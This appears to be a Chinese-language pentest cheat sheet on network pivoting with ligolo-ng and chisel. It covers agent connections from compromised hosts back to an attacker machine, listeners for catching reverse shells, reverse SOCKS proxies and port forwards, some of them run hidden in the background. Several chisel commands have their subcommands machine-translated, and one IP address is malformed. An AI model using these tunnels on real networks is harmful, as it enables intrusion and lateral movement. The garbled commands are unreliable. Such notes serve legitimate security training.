ligolo-ng
初始化操作:
1 2
| sudo ip tuntap add user /your_username/ mode tun ligolo sudo ip link set ligolo up
|
启动服务端:
客户端连接(在内网机器上执行,要求能出网):
windows:
1
| .\agent.exe -connect 192.168.45.248:11601 -ignore-cert
|
linux:
1
| ./agent -connect 192.168.45.153:11601 -ignore-cert
|
随后在服务端添加网段:
1
| sudo ip route add 172.16.216.0/24 dev ligolo
|
然后选择session并启动隧道连接
session命令选择session,然后输入start启动连接
随后便可以使用nmap扫描内网:
设置监听器:
1
| listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443
|
可以用来接收反弹的shell和创建web服务传输文件,使用listener_list可以查看监听器列表
chisel
客户端和服务器版本应该相同
它无法在内网中监听反向shell!!!
由于其特殊性,有时不会被防火墙等发现或阻止。
但是执行nmap扫描时会花费更多时间,因为socks代理只支持TCP扫描。而chisel无法接收反向shell。
socks 代理
kali:
1
| chisel 服务器 --port 8080 --reverse
|
目标:
后台运行
1
| Start-Job -ScriptBlock { c:\my\chisel.exe 客户端 192.168.45.218:8080 R:socks }
|
1
| /tmp/chisel 客户端 192.168.45.153:8080 R:socks > /dev/null 2>&1 &
|
直接运行
1
| c:\my\chisel.exe 客户端 192.168.45.218:8080 R:socks
|
1
| /tmp/chisel 客户端 192.168.45.153:8080 R:socks
|
然后使用代理执行命令与内网通信
端口转发
反向模式:将客户端的 remote:port
共享给服务器的 local:port
严格模式:将服务器的 remote:port
共享给客户端的 local:port
反向连接比正向连接更常见。因为防火墙会阻止我们主动连接到目标服务器:
1
| chisel 服务器 --port 8080 --reverse
|
1
| chisel.exe 服务器 --port 8080 --reverse
|
客户端:
1
| /tmp/chisel 客户端 192.168.45.153:8080 R:8000:127.0.0.1:8000
|
1
| .\chisel.exe 客户端 192.168.45.153:8080 R:8000:127.0.0.1:8000
|
后台运行
1
| /tmp/chisel 客户端 192.168.45.220:8080 R:8000:127.0.0.1:8000 &
|
1
| Start-Job -ScriptBlock { .\chisel.exe 客户端 192.168.45.153:8080 R:8000:127.0.0.1:8000 }
|
多个端口
1
| /tmp/chisel 客户端 192.168.45.153:51234 R:8000:127.0.0.1:8000 R:8443:127.0.01:8443
|
1 2
| # “R” 是 “127.0.0.1” 的简写 # 实际上,在攻击主机上监听 127.0.0.1
|
只需添加 remote_socket